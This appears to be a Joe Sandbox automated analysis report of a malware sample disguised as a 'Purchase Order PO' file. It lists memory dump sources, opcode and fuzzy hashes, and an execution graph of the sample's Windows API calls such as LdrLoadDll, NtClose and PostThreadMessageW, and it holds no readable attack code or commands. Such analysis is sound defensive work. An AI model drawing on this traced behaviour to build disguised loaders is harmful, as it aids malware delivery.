                                                                                                                            • String ID: 4'^q$4'^q$4'^q$4|cq$4|cq$$^q
                                                                                                                            • API String ID: 0-1027864050
                                                                                                                            • Opcode ID: bfe800c47b810d4219087b47bd7ba9da0ab9c35de333b9ba9e04f57e658bfddd
                                                                                                                            • Instruction ID: 6aac7eef1cfcca6262ccca3cb0cd5e63bbf191eac8226ba933be826ce95b584c
                                                                                                                            • Opcode Fuzzy Hash: bfe800c47b810d4219087b47bd7ba9da0ab9c35de333b9ba9e04f57e658bfddd
                                                                                                                            • Instruction Fuzzy Hash: 6422F4357052618FC715EF3CD8A46AA7BA2BF85310B1644ABD586CF362CE20DC86C7D5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'^q$:$pbq$~
                                                                                                                            • API String ID: 0-999388165
                                                                                                                            • Opcode ID: d2b617d2f4b4eb11824a4049109322099ef4f11546363796df5691c5d0dc58a5
                                                                                                                            • Instruction ID: dbb083d0deb10089e16ae9993cb73a6d43c76d7fa97c59ff3aa74fd971f6f404
                                                                                                                            • Opcode Fuzzy Hash: d2b617d2f4b4eb11824a4049109322099ef4f11546363796df5691c5d0dc58a5
                                                                                                                            • Instruction Fuzzy Hash: B142C075A00218DFDB15CFA9C984F99BBB2FF48304F1580EAE609AB265DB31D991DF10
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 94d54d4e5bea62841e275a22216d09c64bb567e8ac5cafbf4b26afd9f3ab0d64
                                                                                                                            • Instruction ID: 683a8839302097dc4aa3fbf77043056a91e1ea7420378a0b3868d78d572608f0
                                                                                                                            • Opcode Fuzzy Hash: 94d54d4e5bea62841e275a22216d09c64bb567e8ac5cafbf4b26afd9f3ab0d64
                                                                                                                            • Instruction Fuzzy Hash: 06E1FCB4E001598FCB14DFA9C5849AEFBF2BF49304F24C16AD415AB356DB31A942CFA1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 791aee17a0c841cb502c7975b2050ea42abcb2a06a6bdb843985ad37eb523970
                                                                                                                            • Instruction ID: 6c5940fd9e91238171776620d79e6c6f72e28b114856cfdd1c9f819994fd45b2
                                                                                                                            • Opcode Fuzzy Hash: 791aee17a0c841cb502c7975b2050ea42abcb2a06a6bdb843985ad37eb523970
                                                                                                                            • Instruction Fuzzy Hash: DFE1CCB4E001198FCB14DFA9C5849AEFBB2BF49305F24C15AE415AB35ADB31A942CF61
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c1f32147cd6eaa3954346df3fbe70149597a24851f4ac6b603c84bda30e69caf
                                                                                                                            • Instruction ID: bff88c9d1721c4d9e3c1878f0357927a6868cf31ae71ad27a9ead1f02158f2d6
                                                                                                                            • Opcode Fuzzy Hash: c1f32147cd6eaa3954346df3fbe70149597a24851f4ac6b603c84bda30e69caf
                                                                                                                            • Instruction Fuzzy Hash: A3E1DBB4E001598FCB14DFA9C6849AEFBB2FF89304F24C15AD415AB356DB31A942CF61
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0818a521b36535ab6406676214ae7f9527ffc3a1315f19de49f3595224698c95
                                                                                                                            • Instruction ID: a1a2202bf54a97965a3b52a3e836b91232b4127f40f313b4ca0988a310dcdded
                                                                                                                            • Opcode Fuzzy Hash: 0818a521b36535ab6406676214ae7f9527ffc3a1315f19de49f3595224698c95
                                                                                                                            • Instruction Fuzzy Hash: FBE1DBB4E001198FDB14DFA9C6849AEFBB2FF89304F24C15AD415AB355DB31A942CF61
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2da645db7db3b5f110733eb3f45f924e9f606638aec963a4b9941615141aade0
                                                                                                                            • Instruction ID: 3e02f092934f4de5c036ef839f371b9738034ab2fa93c561c4552fada5569ca7
                                                                                                                            • Opcode Fuzzy Hash: 2da645db7db3b5f110733eb3f45f924e9f606638aec963a4b9941615141aade0
                                                                                                                            • Instruction Fuzzy Hash: 598129164AA6F11AE702BF7CEAB12CA7F60DF92225F0904A3C1D48D46B995584CDC2DE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0f8d040167c5c101b79f835dce187a6b2e7711772f84bd1ca8898a9935636c2b
                                                                                                                            • Instruction ID: abd4e93cf5ef985fb60b4bb333818543121b935163592d60d1007dab4ea84ff2
                                                                                                                            • Opcode Fuzzy Hash: 0f8d040167c5c101b79f835dce187a6b2e7711772f84bd1ca8898a9935636c2b
                                                                                                                            • Instruction Fuzzy Hash: 64D10731D2065A8ACB00EF68D994ADDB7B1EFD5300F10979AE0093B625EF706AC9CF51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1740977978.0000000001140000.00000040.00000800.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1140000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 01dbd2506d6828abcc096fb0263c8ed14b58488aa932accfdf5bb68dee35096d
                                                                                                                            • Instruction ID: 4cbeabe58a693b04c87d6006074921a6779b1afcbdb665df464bf19194d16f87
                                                                                                                            • Opcode Fuzzy Hash: 01dbd2506d6828abcc096fb0263c8ed14b58488aa932accfdf5bb68dee35096d
                                                                                                                            • Instruction Fuzzy Hash: D9A18136F00206CFCF19DFB8C48059EBBB2FF84705B1545AAE915AB265DB35D916CB80
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 66d4ed4df7113e23992071679f8375cf31ecba8c5c01ff4628fbc3376483be4c
                                                                                                                            • Instruction ID: 2c9486aaaa30d47e3ac730172a5b1fa3521581c0f56fa9ae21394bce6e725377
                                                                                                                            • Opcode Fuzzy Hash: 66d4ed4df7113e23992071679f8375cf31ecba8c5c01ff4628fbc3376483be4c
                                                                                                                            • Instruction Fuzzy Hash: 59D1F731D2065A8ACB10EF68D994ADDB7B1EFD5300F10979AE0093B625EF706AC9CF51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9db34abd126ea16c9c0fbf5057c4322bce165652fd7247b88ea70a6e71b912f0
                                                                                                                            • Instruction ID: dd09878ab7ee766252e8090b98ea34be46a68a47f0d3fdb45a0257b4f1315e9b
                                                                                                                            • Opcode Fuzzy Hash: 9db34abd126ea16c9c0fbf5057c4322bce165652fd7247b88ea70a6e71b912f0
                                                                                                                            • Instruction Fuzzy Hash: 80C1F631D2065A8ACB10EF68D994ADDB7B1FF95300F10979AE0093B625EF706AC5CF51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1745904555.0000000007460000.00000040.00000800.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7460000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2de875251594270dc0a5308863741166a95aa131128214250997c42620e002c1
                                                                                                                            • Instruction ID: cb0e63d700f8e215cfafce0ba58bbcb6e00e8073c926071bf8efa3cc776766ae
                                                                                                                            • Opcode Fuzzy Hash: 2de875251594270dc0a5308863741166a95aa131128214250997c42620e002c1
                                                                                                                            • Instruction Fuzzy Hash: B7E09AB8958118CBCB108F94E4495F8FB7CE75B321F453562E51EA3211D73055928F15
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'^q$Hbq$$^q$$^q
                                                                                                                            • API String ID: 0-3400431855
                                                                                                                            • Opcode ID: c7694f2fefbe89fa691bf0bca0bf9037d5c46dd239f0cce67644bc3f915a973a
                                                                                                                            • Instruction ID: 7ab738d3434277b2aedd0e3fff83126a37c9f87ffd73f2ee4cc8694c6b4fd734
                                                                                                                            • Opcode Fuzzy Hash: c7694f2fefbe89fa691bf0bca0bf9037d5c46dd239f0cce67644bc3f915a973a
                                                                                                                            • Instruction Fuzzy Hash: B051C9307081114F9B19AA39696963F7AEBBFC4741B1A446FE64BCF394DF24CC4683A1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1744681512.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5df0000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: \;^q$\;^q$\;^q$\;^q
                                                                                                                            • API String ID: 0-3001612457
                                                                                                                            • Opcode ID: b3edccb1e21fdb23f23d64bee53acede7dfc291ff21b66fbfee6f1922a37a943
                                                                                                                            • Instruction ID: 3e86a7adf67c6ffd0e33883d00d5439b5ace7da417427bce9ba64d4188a21bba
                                                                                                                            • Opcode Fuzzy Hash: b3edccb1e21fdb23f23d64bee53acede7dfc291ff21b66fbfee6f1922a37a943
                                                                                                                            • Instruction Fuzzy Hash: 3441D4327086149FCB14CE3CE854A297BFAFF85611B1640ABE64ACB371DA61DC41CB90

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:1.3%
                                                                                                                            Dynamic/Decrypted Code Coverage:5.1%
                                                                                                                            Signature Coverage:8%
                                                                                                                            Total number of Nodes:138
                                                                                                                            Total number of Limit Nodes:8
                                                                                                                            execution_graph 87551 424ce3 87556 424cfc 87551->87556 87552 424d8c 87553 424d47 87559 42e743 87553->87559 87556->87552 87556->87553 87557 424d87 87556->87557 87558 42e743 RtlFreeHeap 87557->87558 87558->87552 87562 42c9e3 87559->87562 87561 424d57 87563 42c9fd 87562->87563 87564 42ca0e RtlFreeHeap 87563->87564 87564->87561 87565 42f7e3 87566 42f7f3 87565->87566 87567 42f7f9 87565->87567 87570 42e823 87567->87570 87569 42f81f 87573 42c993 87570->87573 87572 42e83e 87572->87569 87574 42c9ad 87573->87574 87575 42c9be RtlAllocateHeap 87574->87575 87575->87572 87683 424953 87684 42496f 87683->87684 87685 424997 87684->87685 87686 4249ab 87684->87686 87687 42c663 NtClose 87685->87687 87688 42c663 NtClose 87686->87688 87689 4249a0 87687->87689 87690 4249b4 87688->87690 87693 42e863 RtlAllocateHeap 87690->87693 87692 4249bf 87693->87692 87694 42bc73 87695 42bc90 87694->87695 87698 1ad2df0 LdrInitializeThunk 87695->87698 87696 42bcb8 87698->87696 87576 41b223 87577 41b267 87576->87577 87578 41b288 87577->87578 87580 42c663 87577->87580 87581 42c67d 87580->87581 87582 42c68e NtClose 87581->87582 87582->87578 87583 413ca3 87585 413cc9 87583->87585 87584 413cf3 87585->87584 87587 413a23 87585->87587 87588 413a3f 87587->87588 87591 42c903 87588->87591 87592 42c91d 87591->87592 87595 1ad2c70 LdrInitializeThunk 87592->87595 87593 413a45 87593->87584 87595->87593 87699 41a4d3 87700 41a4e8 87699->87700 87702 41a542 87699->87702 87700->87702 87703 41e433 87700->87703 87704 41e459 87703->87704 87708 41e54d 87704->87708 87709 42f913 87704->87709 87706 41e4ee 87707 42bcc3 LdrInitializeThunk 87706->87707 87706->87708 87707->87708 87708->87702 87710 42f883 87709->87710 87711 42e823 RtlAllocateHeap 87710->87711 87712 42f8e0 87710->87712 87713 42f8bd 87711->87713 87712->87706 87714 42e743 RtlFreeHeap 87713->87714 87714->87712 87715 413f93 87716 413fad 87715->87716 87718 413fcb 87716->87718 87721 417723 87716->87721 87719 414010 87718->87719 87720 413fff PostThreadMessageW 87718->87720 87720->87719 87722 417747 87721->87722 87723 417783 LdrLoadDll 87722->87723 87724 41774e 87722->87724 87723->87724 87724->87718 87596 401b04 87597 401b19 87596->87597 87600 42fcb3 87597->87600 87603 42e2f3 87600->87603 87604 42e319 87603->87604 87615 4072e3 87604->87615 87606 42e32f 87614 401c17 87606->87614 87618 41b033 87606->87618 87608 42e34e 87609 42e363 87608->87609 87633 42ca33 87608->87633 87629 428203 87609->87629 87612 42e37d 87613 42ca33 ExitProcess 87612->87613 87613->87614 87617 4072f0 87615->87617 87636 4163e3 87615->87636 87617->87606 87619 41b05f 87618->87619 87654 41af23 87619->87654 87622 41b0a4 87625 41b0c0 87622->87625 87627 42c663 NtClose 87622->87627 87623 41b08c 87624 41b097 87623->87624 87626 42c663 NtClose 87623->87626 87624->87608 87625->87608 87626->87624 87628 41b0b6 87627->87628 87628->87608 87630 428265 87629->87630 87632 428272 87630->87632 87665 418583 87630->87665 87632->87612 87634 42ca4d 87633->87634 87635 42ca5e ExitProcess 87634->87635 87635->87609 87637 416400 87636->87637 87639 416419 87637->87639 87640 42d0d3 87637->87640 87639->87617 87642 42d0ed 87640->87642 87641 42d11c 87641->87639 87642->87641 87647 42bcc3 87642->87647 87645 42e743 RtlFreeHeap 87646 42d195 87645->87646 87646->87639 87648 42bce0 87647->87648 87651 1ad2c0a 87648->87651 87649 42bd0c 87649->87645 87652 1ad2c1f LdrInitializeThunk 87651->87652 87653 1ad2c11 87651->87653 87652->87649 87653->87649 87655 41af3d 87654->87655 87659 41b019 87654->87659 87660 42bd63 87655->87660 87658 42c663 NtClose 87658->87659 87659->87622 87659->87623 87661 42bd80 87660->87661 87664 1ad35c0 LdrInitializeThunk 87661->87664 87662 41b00d 87662->87658 87664->87662 87666 4185ad 87665->87666 87672 418aab 87666->87672 87673 413c03 87666->87673 87668 4186da 87669 42e743 RtlFreeHeap 87668->87669 87668->87672 87670 4186f2 87669->87670 87671 42ca33 ExitProcess 87670->87671 87670->87672 87671->87672 87672->87632 87674 413c23 87673->87674 87676 413c8c 87674->87676 87678 41b343 RtlFreeHeap LdrInitializeThunk 87674->87678 87676->87668 87677 413c82 87677->87668 87678->87677 87679 418cc8 87680 42c663 NtClose 87679->87680 87681 418cd2 87680->87681 87682 1ad2b60 LdrInitializeThunk

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 356 417723-41774c call 42f323 359 417752-417760 call 42f923 356->359 360 41774e-417751 356->360 363 417770-417781 call 42ddc3 359->363 364 417762-41776d call 42fbc3 359->364 369 417783-417797 LdrLoadDll 363->369 370 41779a-41779d 363->370 364->363 369->370
                                                                                                                            APIs
                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417795
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2131373286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order PO.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Load
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2234796835-0
                                                                                                                            • Opcode ID: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                                                                                            • Instruction ID: c8367a89be375ba73a30cdb688ded44f01425706de2ca614d69ed47fcf1ac29a
                                                                                                                            • Opcode Fuzzy Hash: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                                                                                            • Instruction Fuzzy Hash: 49010CB5E00209BBDB10DBE5DC42FDEB7789B54308F4041AAA91897281FA35EB588B95

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 376 42c663-42c69c call 404783 call 42d8c3 NtClose
                                                                                                                            APIs
                                                                                                                            • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C697
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2131373286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order PO.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Close
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3535843008-0
                                                                                                                            • Opcode ID: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                                                                                            • Instruction ID: 55d98cbac179b72a764dd86cd5ec1f11a461976065f381c4f300eafe1b6f3ecb
                                                                                                                            • Opcode Fuzzy Hash: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                                                                                            • Instruction Fuzzy Hash: E8E086326402147BD210FB6ADC41FD7776CDFC5714F00451AFA1867242C6757A1587F5

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 390 1ad2b60-1ad2b6c LdrInitializeThunk
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 34ca357fc210f7ecade8f377c4c78d81c6b01f74b5d524e2850a3a39207debe0
                                                                                                                            • Instruction ID: c790ad6c95bfac245f4665d06b02890605d7eb3c6526630fb6f154f41d92059f
                                                                                                                            • Opcode Fuzzy Hash: 34ca357fc210f7ecade8f377c4c78d81c6b01f74b5d524e2850a3a39207debe0
                                                                                                                            • Instruction Fuzzy Hash: 0590026120240003410571584418616404A97E0201F56C021E1014690DC52989916225
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 67949c5a207c9e71bcfdb04459d7f7c1d1aae4833ba8a08289bcf8b8c0c7e9ab
                                                                                                                            • Instruction ID: f80f269bf434c6bbedd977ff98d7a94e7f1c83aa58cda6f5ad3facd8cd1aa0b7
                                                                                                                            • Opcode Fuzzy Hash: 67949c5a207c9e71bcfdb04459d7f7c1d1aae4833ba8a08289bcf8b8c0c7e9ab
                                                                                                                            • Instruction Fuzzy Hash: 6890023120140413D11171584508707004997D0241F96C412E0424658DD65A8A52A221

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 391 1ad2c70-1ad2c7c LdrInitializeThunk
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: b8231f4f3d6a38715b71302504c64650bb00e7c30a276ed839f4d192a6860d97
                                                                                                                            • Instruction ID: 91adfbcf3feb897b5115673615936fa793c1eddb116a527cbf9d5dbbb53f28cf
                                                                                                                            • Opcode Fuzzy Hash: b8231f4f3d6a38715b71302504c64650bb00e7c30a276ed839f4d192a6860d97
                                                                                                                            • Instruction Fuzzy Hash: BD90023120148802D1107158840874A004597D0301F5AC411E4424758DC69989917221
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 93f31c87990cf9b751c42ac13a11304957d1e8cdb7a611a621fb458b3999edbf
                                                                                                                            • Instruction ID: 2b32c941dac36199d736a8a8a4f00d99ec7e9c5cb100345e6dab8f956bd7c8bc
                                                                                                                            • Opcode Fuzzy Hash: 93f31c87990cf9b751c42ac13a11304957d1e8cdb7a611a621fb458b3999edbf
                                                                                                                            • Instruction Fuzzy Hash: FB90023160550402D10071584518706104597D0201F66C411E0424668DC7998A5166A2

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2131373286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order PO.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePostThread
                                                                                                                            • String ID: S$l420377x$l420377x
                                                                                                                            • API String ID: 1836367815-2727433438
                                                                                                                            • Opcode ID: 359c6fffe9613725b5ac8c672145e67f63efc52315c8541c79e7ad6c697c6183
                                                                                                                            • Instruction ID: c2806ac613a218a9f43bc075071cdee210e11ad5ac0fb3b5002561ad8e7d22f2
                                                                                                                            • Opcode Fuzzy Hash: 359c6fffe9613725b5ac8c672145e67f63efc52315c8541c79e7ad6c697c6183
                                                                                                                            • Instruction Fuzzy Hash: 43114C71D0015C7AEB10AAE69C81DEF7B7CDF4579CF448069FA0467141D27C8E064BB5

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 15 413f93-413fc5 call 42e7e3 call 42f1f3 20 413fcb-413ffd call 404733 call 424e23 15->20 21 413fc6 call 417723 15->21 26 41401d-414023 20->26 27 413fff-41400e PostThreadMessageW 20->27 21->20 27->26 28 414010-41401a 27->28 28->26
                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2131373286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order PO.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePostThread
                                                                                                                            • String ID: l420377x$l420377x
                                                                                                                            • API String ID: 1836367815-444879537
                                                                                                                            • Opcode ID: c759df97fc8d8bd9950daa468166aab63e6b13b68f94bc1cf4dd968c4ef8860b
                                                                                                                            • Instruction ID: 33197e0a7dcb6eb663e71045ce9ebb9a0ec692f75d002f1c99a84e6dd662f6bc
                                                                                                                            • Opcode Fuzzy Hash: c759df97fc8d8bd9950daa468166aab63e6b13b68f94bc1cf4dd968c4ef8860b
                                                                                                                            • Instruction Fuzzy Hash: 4A0126B2D0025C7AEB10AAE69C81DEFBB7CDF44798F408069FA0467141D67C9E064BB5

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 29 413f72-413f79 30 413fb5-413ffd call 417723 call 404733 call 424e23 29->30 31 413f7b-413f87 29->31 38 41401d-414023 30->38 39 413fff-41400e PostThreadMessageW 30->39 39->38 40 414010-41401a 39->40 40->38
                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2131373286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order PO.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePostThread
                                                                                                                            • String ID: l420377x$l420377x
                                                                                                                            • API String ID: 1836367815-444879537
                                                                                                                            • Opcode ID: 3262b01b000be0360b63c840c83d9d807fb3e09adfdf533a4899f21b81f85822
                                                                                                                            • Instruction ID: 07d8ccd72df32b7def514bcf1009cf5c80a90bfc08a7e37c420c6dc4dd04ca91
                                                                                                                            • Opcode Fuzzy Hash: 3262b01b000be0360b63c840c83d9d807fb3e09adfdf533a4899f21b81f85822
                                                                                                                            • Instruction Fuzzy Hash: 5D0140B3E0005876D7105EA55CC1CEFBB7CDE84754F4040ABFA0497201E66E4E024BA5

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 41 42c9e3-42ca24 call 404783 call 42d8c3 RtlFreeHeap
                                                                                                                            APIs
                                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CA1F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2131373286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order PO.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeHeap
                                                                                                                            • String ID: wdA
                                                                                                                            • API String ID: 3298025750-2931128418
